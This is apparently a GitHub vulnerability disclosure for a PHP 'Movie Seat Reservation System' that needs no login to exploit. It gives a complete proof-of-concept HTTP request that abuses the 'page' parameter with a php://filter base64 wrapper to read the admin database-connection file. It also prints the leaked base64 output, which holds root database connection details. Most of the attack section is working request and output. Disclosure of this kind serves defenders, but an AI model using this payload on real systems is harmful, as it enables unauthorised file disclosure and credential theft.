Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Movie Seat Reservation System File Disclosure

  • Note => don't need login

Exploit

  • Exploit with Burp Suite
http://192.168.1.101:8080/Movie_Seat_Reservation_System/index.php?page=home

image

  • Use Burp Suite capture request and payload => Send image
  • Then decode Base64
 PD9waHAgDQoNCiRjb25uPSBuZXcgbXlzcWxpKCdsb2NhbGhvc3QnLCdyb290JywnJywndGhlYXRlcl9kYicpb3IgZGllKCJDb3VsZCBub3QgY29ubmVjdCB0byBteXNxbCIubXlzcWxpX2Vycm9yKCRjb24pKTsNCg==    

image

Vulnerable Code

image

POC

  • Request
GET /Movie_Seat_Reservation_System/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1
Host: 192.168.1.101:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.101:8080/Movie_Seat_Reservation_System/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=0722dtqnb1dgvuono8uubajcae
Connection: close